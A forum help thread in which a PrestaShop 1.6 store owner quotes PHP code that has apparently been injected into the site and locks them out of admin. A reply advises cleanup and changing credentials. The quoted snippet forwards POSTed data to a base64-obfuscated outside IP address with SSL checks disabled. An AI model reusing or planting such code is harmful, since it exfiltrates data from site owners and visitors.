Jump to content

Cannot access admin. the site shows strange code.


Recommended Posts

My site is using PS 1.6.X .

 

Suddenly i got the following message at the top of the page and the admin page only shows this message. i cannot access admin anymore.

try {if(isset($_POST['statistics_hash'])){$array = array('statistics_hash' => $_POST['statistics_hash'],);$linked="";$ch = curl_init(base64_decode("aHR0cHM6Ly80NS4xOTcuMTQxLjI1MC9hbmFseXRpY3MucGhw"));curl_setopt($ch, CURLOPT_POST, 1);curl_setopt($ch, CURLOPT_POSTFIELDS, $array); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);curl_setopt($ch, CURLOPT_HEADER, false);curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);$html = curl_exec($ch);curl_close($ch); }} catch (Exception $e) {}

 

Does any one know what's wrong? The Dev mode is disabled

Link to comment
Share on other sites

Seams some more people have same issue in 1.6.  Check this topic in French, do use google translate

 

But in general 1.6 had issues with theme and some modules that allowed access  to hackers.

Do check that topic and try to find files that are changed, remove code, change FTP, Hosting access. Backup.

 

Good luck

Link to comment
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now
×
×
  • Create New...